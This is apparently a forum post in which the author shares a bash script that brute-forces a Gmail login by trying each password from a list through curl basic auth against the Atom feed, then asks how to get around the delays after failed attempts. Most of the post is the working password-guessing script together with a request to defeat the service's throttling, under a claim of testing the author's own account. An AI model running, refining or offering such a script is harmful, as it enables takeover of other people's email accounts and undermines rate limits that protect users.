I wrote a bash script to check how well my gmail stands up against brute forcing. Since my yahoo was just hacked. It only sent out emails containing links to all my contacts and nothing was modified. So I assume it it was a bot/worm trying to spread itself.
It works fine, just hangs for a few minutes or so on a failed attempt. Then continues until it finds the right password.
Other times it will just run without hanging and make a quick pass through.
What can I do to circumvent this? Re-write it in C with cURL?? or if I encounter an error stop curl and re-run??
The script
Code:
#!/bin/bash
if [ $# -lt 2 ]; then
echo "Usage: $0 gmail_username passwordlist.lst";
exit
fi
readarray -t pword < <(cat $2);
uname=$1;
for file in "${pword[@]}"; do
CURL=$(curl --fail --user $uname:$file "https://mail.google.com/mail/feed/atom");
if [[ ! "${CURL}" ]] ; then
echo "Failed login.";
else
echo -e "\nPASSWORD WAS: $file";
fi
done